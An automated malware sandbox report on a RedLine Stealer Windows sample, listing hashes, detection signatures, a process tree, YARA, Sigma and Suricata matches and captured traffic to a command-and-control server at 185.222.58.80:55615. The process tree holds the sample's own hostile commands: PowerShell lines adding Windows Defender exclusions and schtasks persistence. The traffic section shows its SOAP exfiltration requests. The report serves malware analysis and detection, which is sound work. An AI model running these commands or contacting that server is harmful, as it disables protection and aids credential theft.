Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PZNfhfaj9O.exe

Overview

General Information

Sample name:PZNfhfaj9O.exe
renamed because original name is a hash value
Original sample name:01d452e81b85a3d399a247852f2f5004.exe
Analysis ID:1532739
MD5:01d452e81b85a3d399a247852f2f5004
SHA1:b1b5bb7edf69875726ea1c627fb0bbef6215143a
SHA256:88fd2273dba726f8e93082eef548564c84ee1f3be9f69a7d02ef9a3ed7f8ea18
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PZNfhfaj9O.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\PZNfhfaj9O.exe" MD5: 01D452E81B85A3D399A247852F2F5004)
    • powershell.exe (PID: 4888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7376 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6336 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PZNfhfaj9O.exe (PID: 7196 cmdline: "C:\Users\user\Desktop\PZNfhfaj9O.exe" MD5: 01D452E81B85A3D399A247852F2F5004)
    • PZNfhfaj9O.exe (PID: 7204 cmdline: "C:\Users\user\Desktop\PZNfhfaj9O.exe" MD5: 01D452E81B85A3D399A247852F2F5004)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • CiENBY.exe (PID: 7296 cmdline: C:\Users\user\AppData\Roaming\CiENBY.exe MD5: 01D452E81B85A3D399A247852F2F5004)
    • schtasks.exe (PID: 7636 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CiENBY.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Roaming\CiENBY.exe" MD5: 01D452E81B85A3D399A247852F2F5004)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.80:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x14102:$a4: get_ScannedWallets
          • 0x2bf22:$a4: get_ScannedWallets
          • 0x43b42:$a4: get_ScannedWallets
          • 0x12f60:$a5: get_ScanTelegram
          • 0x2ad80:$a5: get_ScanTelegram
          • 0x429a0:$a5: get_ScanTelegram
          • 0x13d86:$a6: get_ScanGeckoBrowsersPaths
          • 0x2bba6:$a6: get_ScanGeckoBrowsersPaths
          • 0x437c6:$a6: get_ScanGeckoBrowsersPaths
          • 0x11ba2:$a7: <Processes>k__BackingField
          • 0x299c2:$a7: <Processes>k__BackingField
          • 0x415e2:$a7: <Processes>k__BackingField
          • 0xfab4:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x278d4:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x3f4f4:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x114d6:$a9: <ScanFTP>k__BackingField
          • 0x292f6:$a9: <ScanFTP>k__BackingField
          • 0x40f16:$a9: <ScanFTP>k__BackingField
          00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 17 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.PZNfhfaj9O.exe.3e42720.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.PZNfhfaj9O.exe.3e42720.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.PZNfhfaj9O.exe.3e42720.2.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  0.2.PZNfhfaj9O.exe.3e42720.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ea:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cb:$v2_6: GetUpdates
                  11.2.CiENBY.exe.3ef3958.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 31 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PZNfhfaj9O.exe", ParentImage: C:\Users\user\Desktop\PZNfhfaj9O.exe, ParentProcessId: 7148, ParentProcessName: PZNfhfaj9O.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", ProcessId: 4888, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PZNfhfaj9O.exe", ParentImage: C:\Users\user\Desktop\PZNfhfaj9O.exe, ParentProcessId: 7148, ParentProcessName: PZNfhfaj9O.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", ProcessId: 4888, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CiENBY.exe, ParentImage: C:\Users\user\AppData\Roaming\CiENBY.exe, ParentProcessId: 7296, ParentProcessName: CiENBY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp", ProcessId: 7636, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PZNfhfaj9O.exe", ParentImage: C:\Users\user\Desktop\PZNfhfaj9O.exe, ParentProcessId: 7148, ParentProcessName: PZNfhfaj9O.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", ProcessId: 6336, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PZNfhfaj9O.exe", ParentImage: C:\Users\user\Desktop\PZNfhfaj9O.exe, ParentProcessId: 7148, ParentProcessName: PZNfhfaj9O.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe", ProcessId: 4888, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PZNfhfaj9O.exe", ParentImage: C:\Users\user\Desktop\PZNfhfaj9O.exe, ParentProcessId: 7148, ParentProcessName: PZNfhfaj9O.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp", ProcessId: 6336, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T21:02:18.471203+020020450001Malware Command and Control Activity Detected185.222.58.8055615192.168.2.449737TCP
                    2024-10-13T21:02:33.500680+020020450001Malware Command and Control Activity Detected185.222.58.8055615192.168.2.449742TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T21:02:24.121653+020020450011Malware Command and Control Activity Detected185.222.58.8055615192.168.2.449737TCP
                    2024-10-13T21:02:37.152967+020020450011Malware Command and Control Activity Detected185.222.58.8055615192.168.2.449742TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T21:02:18.069928+020028496621Malware Command and Control Activity Detected192.168.2.449737185.222.58.8055615TCP
                    2024-10-13T21:02:28.413704+020028496621Malware Command and Control Activity Detected192.168.2.449742185.222.58.8055615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T21:02:23.674747+020028493511Malware Command and Control Activity Detected192.168.2.449737185.222.58.8055615TCP
                    2024-10-13T21:02:33.726327+020028493511Malware Command and Control Activity Detected192.168.2.449742185.222.58.8055615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T21:02:39.127691+020028482001Malware Command and Control Activity Detected192.168.2.449749185.222.58.8055615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T21:02:27.747604+020028493521Malware Command and Control Activity Detected192.168.2.449741185.222.58.8055615TCP
                    2024-10-13T21:02:37.560860+020028493521Malware Command and Control Activity Detected192.168.2.449748185.222.58.8055615TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.80:55615"], "Bot Id": "cheat"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeReversingLabs: Detection: 60%
                    Multi AV Scanner detection for submitted file
                    Source: PZNfhfaj9O.exeReversingLabs: Detection: 60%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Machine Learning detection for sample
                    Source: PZNfhfaj9O.exeJoe Sandbox ML: detected
                    Source: PZNfhfaj9O.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: PZNfhfaj9O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: ACRONG~1.TXTntkrnlmp.pdbxx, source: CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: DQOrL.pdbSHA256 source: PZNfhfaj9O.exe, CiENBY.exe.0.dr
                    Source: Binary string: DQOrL.pdb source: PZNfhfaj9O.exe, CiENBY.exe.0.dr
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 4x nop then jmp 0766F48Dh0_2_0766EF97
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 4x nop then jmp 0717E72Dh11_2_0717E237

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49737 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.80:55615 -> 192.168.2.4:49737
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49737 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.80:55615 -> 192.168.2.4:49737
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49742 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49741 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.80:55615 -> 192.168.2.4:49742
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49742 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.80:55615 -> 192.168.2.4:49742
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49748 -> 185.222.58.80:55615
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49749 -> 185.222.58.80:55615
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.222.58.80:55615
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49749
                    Source: global trafficTCP traffic: 192.168.2.4:49737 -> 185.222.58.80:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.80:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.80:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.80:55615Content-Length: 930524Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.80:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.80:55615Content-Length: 930516Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.80:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.80:55615Content-Length: 930112Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.80:55615Content-Length: 930104Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.80
